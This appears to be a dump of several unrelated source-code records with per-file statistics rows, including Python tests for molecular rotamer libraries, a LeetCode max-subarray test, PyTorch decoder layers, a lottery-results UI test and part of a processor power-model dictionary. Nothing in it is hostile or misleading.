where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
# Test core constraint with a multiple central core
molecule = Molecule(ligand_path,
core_constraints=[' C8 ', ' C9 ', ' C10'],
exclude_terminal_rotamers=True)
rotamers_per_branch = molecule.rotamers
assert len(rotamers_per_branch) == 2, "Found an invalid number " + \
"of branches: {}".format(len(rotamers_per_branch))
atom_list_1 = list()
atom_list_2 = list()
rotamers = rotamers_per_branch[0]
for rotamer in rotamers:
atom_list_1.append(set([rotamer.index1, rotamer.index2]))
rotamers = rotamers_per_branch[1]
for rotamer in rotamers:
atom_list_2.append(set([rotamer.index1, rotamer.index2]))
EXPECTED_INDICES_1 = [set([8, 9]), set([7, 8]), set([6, 7]),
set([5, 6]), set([2, 5]), set([0, 2]),
set([0, 1])]
EXPECTED_INDICES_2 = [set([12, 11]), set([12, 13]), set([13, 14]),
set([14, 15]), set([15, 16]), set([16, 17]),
set([17, 18])]
where_1 = list()
for atom_pair in atom_list_1:
if atom_pair in EXPECTED_INDICES_1:
where_1.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_1.append(2)
else:
where_1.append(0)
where_2 = list()
for atom_pair in atom_list_2:
if atom_pair in EXPECTED_INDICES_1:
where_2.append(1)
elif atom_pair in EXPECTED_INDICES_2:
where_2.append(2)
else:
where_2.append(0)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)), "Invalid rotamer library " + \
"{}, {}".format(where_1, where_2)
assert (all(i == 1 for i in where_1)
and all(i == 2 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_1)
and len(where_2) == len(EXPECTED_INDICES_2)) or \
(all(i == 2 for i in where_1)
and all(i == 1 for i in where_2)
and len(where_1) == len(EXPECTED_INDICES_2)
and len(where_2) == len(EXPECTED_INDICES_1)), "Unexpected " + \
"number of rotamers"
def test_rotamer_core_constraint_adjacency(self):
"""
It tests the adjacency check up that is performed prior building
the rotamer library builder with core constraints.
"""
LIGAND_PATH = 'ligands/oleic_acid.pdb'
ligand_path = get_data_file_path(LIGAND_PATH)
# Test adjacent core constraint selection
_ = Molecule(ligand_path,
core_constraints=[' C8 ', ' C9 ', ' C10'])
# Test non adjacent core constraint selection
with pytest.raises(ValueError) as e:
_ = Molecule(ligand_path,
core_constraints=[' C1 ', ' C9 ', ' C10'])
assert str(e.value) == 'All atoms in atom constraints must be ' \
+ 'adjacent and atom C1 is not'
| 38.803665
| 79
| 0.526951
| 1,906
| 14,823
| 3.88405
| 0.071354
| 0.099284
| 0.073484
| 0.047548
| 0.901391
| 0.893692
| 0.893692
| 0.880724
| 0.849791
| 0.849791
| 0
| 0.061873
| 0.354517
| 14,823
| 381
| 80
| 38.905512
| 0.711852
| 0.052958
| 0
| 0.904059
| 0
| 0
| 0.062338
| 0.006335
| 0
| 0
| 0
| 0
| 0.081181
| 1
| 0.01476
| false
| 0
| 0.01107
| 0
| 0.02952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfd51321e416d82e6449149b55525903a92332de
| 3,193
|
py
|
Python
|
src/p053-maximum-subarray/test_solution.py
|
bazadactyl/leetcode-solutions
|
2e332b8ec4c4724b074faa8e7a76e861082198bb
|
[
"Unlicense"
] | null | null | null |
src/p053-maximum-subarray/test_solution.py
|
bazadactyl/leetcode-solutions
|
2e332b8ec4c4724b074faa8e7a76e861082198bb
|
[
"Unlicense"
] | null | null | null |
src/p053-maximum-subarray/test_solution.py
|
bazadactyl/leetcode-solutions
|
2e332b8ec4c4724b074faa8e7a76e861082198bb
|
[
"Unlicense"
] | null | null | null |
import unittest
from solution import Solution
class SolutionTestCase(unittest.TestCase):
def test_example_1(self):
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
expected = 6
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_example_2(self):
nums = [1]
expected = 1
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_example_3(self):
nums = [5, 4, -1, 7, 8]
expected = 23
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_1(self):
nums = [-10]
expected = -10
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_2(self):
nums = [0]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_3(self):
nums = [1, 2]
expected = 3
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_4(self):
nums = [-1, 2]
expected = 2
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_5(self):
nums = [-1, -2]
expected = -1
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_6(self):
nums = [-2, -1]
expected = -1
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_7(self):
nums = [0, 0]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_8(self):
nums = [0, 100, 0]
expected = 100
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_9(self):
nums = [0, -100, 0]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_10(self):
nums = [100, 0, 100]
expected = 200
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_11(self):
nums = [-100, 0, -100]
expected = 0
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_12(self):
nums = [200, -100, 900, -100, 300]
expected = 1200
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_13(self):
nums = [100, -100, 900, -100, 100]
expected = 900
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_14(self):
nums = [101, -100, 900, -100, 101]
expected = 902
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
def test_case_15(self):
nums = [-10, -15, -2, -17, -20]
expected = -2
output = Solution().maxSubArray(nums)
self.assertEqual(expected, output)
if __name__ == '__main__':
unittest.main()
| 27.059322
| 46
| 0.5772
| 362
| 3,193
| 4.969613
| 0.127072
| 0.070039
| 0.250139
| 0.290161
| 0.795998
| 0.774875
| 0.735409
| 0.735409
| 0.735409
| 0.735409
| 0
| 0.072165
| 0.301284
| 3,193
| 117
| 47
| 27.290598
| 0.7342
| 0
| 0
| 0.442105
| 0
| 0
| 0.002505
| 0
| 0
| 0
| 0
| 0
| 0.189474
| 1
| 0.189474
| false
| 0
| 0.021053
| 0
| 0.221053
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44a1b1628f95f3a5c325b62a5de965e5f95c0bf3
| 98
|
py
|
Python
|
examples/wagsley/wagsley/schema/types/query.py
|
Blogsley/blogsley
|
0ca17397af5d53c2fac3affb5eacec2f8d941d37
|
[
"MIT"
] | null | null | null |
examples/wagsley/wagsley/schema/types/query.py
|
Blogsley/blogsley
|
0ca17397af5d53c2fac3affb5eacec2f8d941d37
|
[
"MIT"
] | null | null | null |
examples/wagsley/wagsley/schema/types/query.py
|
Blogsley/blogsley
|
0ca17397af5d53c2fac3affb5eacec2f8d941d37
|
[
"MIT"
] | null | null | null |
from accounts.query import *
from posts.query import *
#from blogsley.django.media.query import *
| 24.5
| 42
| 0.785714
| 14
| 98
| 5.5
| 0.571429
| 0.428571
| 0.38961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122449
| 98
| 3
| 43
| 32.666667
| 0.895349
| 0.418367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
44b6c918c54d93df9c7726a7e41d852e02637c93
| 171
|
py
|
Python
|
forgebox/test_nbdev.py
|
raynardj/forgebox
|
4ed057ecb1fd0e1b062e6ffb64cf2e4279cbf3ac
|
[
"MIT"
] | 3
|
2020-02-05T08:55:22.000Z
|
2021-12-24T06:42:29.000Z
|
forgebox/test_nbdev.py
|
raynardj/forgebox
|
4ed057ecb1fd0e1b062e6ffb64cf2e4279cbf3ac
|
[
"MIT"
] | 8
|
2020-08-25T10:28:53.000Z
|
2021-08-03T09:43:11.000Z
|
forgebox/test_nbdev.py
|
raynardj/forgebox
|
4ed057ecb1fd0e1b062e6ffb64cf2e4279cbf3ac
|
[
"MIT"
] | null | null | null |
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/test_nbdev.ipynb (unless otherwise specified).
__all__ = ['test_nbdev_func']
# Cell
def test_nbdev_func():
return 42
| 21.375
| 94
| 0.736842
| 25
| 171
| 4.68
| 0.76
| 0.230769
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.157895
| 171
| 8
| 95
| 21.375
| 0.798611
| 0.567251
| 0
| 0
| 1
| 0
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
44b80a7baf0879bdcb523f27f1c94b82870e62b2
| 1,731
|
py
|
Python
|
models/decoders.py
|
exnx/gcn-triplet-encoding
|
a26aaa87724b0003a08d5c2d8d1d3f96430df500
|
[
"MIT"
] | 20
|
2020-08-10T15:46:35.000Z
|
2022-01-18T12:10:09.000Z
|
models/decoders.py
|
exnx/gcn-triplet-encoding
|
a26aaa87724b0003a08d5c2d8d1d3f96430df500
|
[
"MIT"
] | 7
|
2020-09-08T17:16:12.000Z
|
2022-03-29T12:25:31.000Z
|
models/decoders.py
|
exnx/gcn-triplet-encoding
|
a26aaa87724b0003a08d5c2d8d1d3f96430df500
|
[
"MIT"
] | 4
|
2020-09-05T07:45:08.000Z
|
2021-12-03T02:45:46.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 8 18:45:02 2020
@author: dipu
"""
import torch.nn as nn
def raster_decoder():
decoder = nn.Sequential(
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(32,16,3),
nn.ReLU(),
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(16,16,3),
nn.ReLU(),
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(16,8,3),
nn.ReLU(),
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(8,3,3),
nn.ReLU(),
)
return decoder
def decoder_25Channel():
decoder = nn.Sequential(
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(32,25,3),
nn.ReLU(),
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(25,25,3),
nn.ReLU(),
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(25,25,3),
nn.ReLU(),
nn.Upsample(scale_factor =2, mode = 'nearest'),
nn.ConvTranspose2d(25,25,3),
nn.ReLU(),
)
return decoder
def decoder_25Channel_convOnly():
decoder = nn.Sequential(
nn.ConvTranspose2d(32,25,3, stride=2),
nn.ReLU(),
nn.ConvTranspose2d(25,25,3, stride=2),
nn.ReLU(),
nn.ConvTranspose2d(25,25,3, stride=2),
nn.ReLU(),
nn.ConvTranspose2d(25,25,3, stride=2),
nn.ReLU(),
)
return decoder
| 24.728571
| 59
| 0.50491
| 196
| 1,731
| 4.397959
| 0.209184
| 0.236659
| 0.083527
| 0.194896
| 0.839907
| 0.817865
| 0.817865
| 0.817865
| 0.735499
| 0.735499
| 0
| 0.0875
| 0.352975
| 1,731
| 69
| 60
| 25.086957
| 0.682143
| 0.054304
| 0
| 0.711111
| 0
| 0
| 0.034398
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.022222
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
44d12aeb002823c21c84507e08640524915ddf01
| 111
|
py
|
Python
|
odoo-13.0/addons/hr_attendance/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/addons/hr_attendance/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
odoo-13.0/addons/hr_attendance/tests/__init__.py
|
VaibhavBhujade/Blockchain-ERP-interoperability
|
b5190a037fb6615386f7cbad024d51b0abd4ba03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import test_hr_attendance_constraints
from . import test_hr_attendance_process
| 22.2
| 44
| 0.774775
| 15
| 111
| 5.333333
| 0.666667
| 0.25
| 0.35
| 0.4
| 0.65
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.126126
| 111
| 4
| 45
| 27.75
| 0.814433
| 0.189189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
44d366dffa7eb0e0249af0f789b8d155cc9fe83e
| 4,083
|
py
|
Python
|
test/ResultsAndPrizes/5x36(old)/test_5x36_results_for_several_draws.py
|
FearFactor1/SPA
|
a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7
|
[
"Apache-2.0"
] | 1
|
2019-12-05T06:50:54.000Z
|
2019-12-05T06:50:54.000Z
|
test/ResultsAndPrizes/5x36(old)/test_5x36_results_for_several_draws.py
|
FearFactor1/SPA
|
a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7
|
[
"Apache-2.0"
] | null | null | null |
test/ResultsAndPrizes/5x36(old)/test_5x36_results_for_several_draws.py
|
FearFactor1/SPA
|
a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7
|
[
"Apache-2.0"
] | null | null | null |
# 5из36(Старая) + Результаты нескольких тиражей
def test_5x36_results_for_several_draws(app):
app.ResultAndPrizes.open_page_results_and_prizes()
app.ResultAndPrizes.click_results_for_several_draws()
app.ResultAndPrizes.click_ok_for_several_draws_modal_window()
app.ResultAndPrizes.button_get_report_winners()
app.ResultAndPrizes.parser_report_text_winners()
assert "РЕЗУЛЬТАТЫ ТИРАЖА" in app.ResultAndPrizes.parser_report_text_winners()
assert "ЛОТО 5/36 (Старая) - Тираж 10573 :" in app.ResultAndPrizes.parser_report_text_winners()
assert "07/09/2017, 19:00:00 ЛОК" in app.ResultAndPrizes.parser_report_text_winners()
assert "Кат." and "Выигрыш руб." and "Кол-во" and "Всего" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5+1" and "0" and "0" and "0" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5" and "30676" and "25" and "766900" in app.ResultAndPrizes.parser_report_text_winners()
assert "4/5" and "2793" and "874" and "2441082" in app.ResultAndPrizes.parser_report_text_winners()
assert "3/5" and "292" and "8232" and "2403744" in app.ResultAndPrizes.parser_report_text_winners()
assert "ЛОТО 5/36 (Старая) - Тираж 10572 :" in app.ResultAndPrizes.parser_report_text_winners()
assert "07/09/2017, 18:16:00 ЛОК" in app.ResultAndPrizes.parser_report_text_winners()
assert "Кат." and "Выигрыш руб." and "Кол-во" and "Всего" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5+1" and "0" and "0" and "0" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5" and "8000" and "67" and "536000" in app.ResultAndPrizes.parser_report_text_winners()
assert "4/5" and "800" and "2096" and "1676800" in app.ResultAndPrizes.parser_report_text_winners()
assert "3/5" and "80" and "19737" and "1578960" in app.ResultAndPrizes.parser_report_text_winners()
assert "ЛОТО 5/36 (Старая) - Тираж 10571 :" in app.ResultAndPrizes.parser_report_text_winners()
assert "07/09/2017, 18:01:00 ЛОК" in app.ResultAndPrizes.parser_report_text_winners()
assert "Кат." and "Выигрыш руб." and "Кол-во" and "Всего" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5+1" and "4815260" and "2" and "9630520" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5" and "8000" and "129" and "1032000" in app.ResultAndPrizes.parser_report_text_winners()
assert "4/5" and "800" and "3065" and "2452000" in app.ResultAndPrizes.parser_report_text_winners()
assert "3/5" and "80" and "29048" and "2323840" in app.ResultAndPrizes.parser_report_text_winners()
assert "ЛОТО 5/36 (Старая) - Тираж 10570 :" in app.ResultAndPrizes.parser_report_text_winners()
assert "07/09/2017, 17:46:00 ЛОК" in app.ResultAndPrizes.parser_report_text_winners()
assert "Кат." and "Выигрыш руб." and "Кол-во" and "Всего" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5+1" and "0" and "0" and "0" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5" and "8000" and "139" and "1112000" in app.ResultAndPrizes.parser_report_text_winners()
assert "4/5" and "800" and "4298" and "3438400" in app.ResultAndPrizes.parser_report_text_winners()
assert "3/5" and "80" and "40331" and "3226480" in app.ResultAndPrizes.parser_report_text_winners()
assert "ЛОТО 5/36 (Старая) - Тираж 10569 :" in app.ResultAndPrizes.parser_report_text_winners()
assert "07/09/2017, 17:31:00 ЛОК" in app.ResultAndPrizes.parser_report_text_winners()
assert "Кат." and "Выигрыш руб." and "Кол-во" and "Всего" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5+1" and "3034294" and "3" and "9102882" in app.ResultAndPrizes.parser_report_text_winners()
assert "5/5" and "8000" and "269" and "2152000" in app.ResultAndPrizes.parser_report_text_winners()
assert "4/5" and "800" and "7449" and "5959200" in app.ResultAndPrizes.parser_report_text_winners()
assert "3/5" and "80" and "69742" and "5579360" in app.ResultAndPrizes.parser_report_text_winners()
app.ResultAndPrizes.comeback_main_page()
| 88.76087
| 113
| 0.752633
| 618
| 4,083
| 4.754045
| 0.169903
| 0.257318
| 0.302246
| 0.377808
| 0.810756
| 0.793737
| 0.793737
| 0.763104
| 0.763104
| 0.763104
| 0
| 0.114326
| 0.128092
| 4,083
| 46
| 114
| 88.76087
| 0.710955
| 0.011021
| 0
| 0.186047
| 0
| 0
| 0.187763
| 0
| 0
| 0
| 0
| 0
| 0.837209
| 1
| 0.023256
| false
| 0
| 0
| 0
| 0.023256
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
44f2358bc38099a093b667b1a917e20d40b93796
| 68,546
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_heteroFair/cmp_sjeng/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_heteroFair/cmp_sjeng/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_heteroFair/cmp_sjeng/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.398842,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.690649,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.396107,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.4856,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.394239,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.65294,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0144583,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.104552,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.106928,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.104552,
'Execution Unit/Register Files/Runtime Dynamic': 0.121386,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.252641,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.661894,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 2.87694,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00420062,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00420062,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00371035,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00146457,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
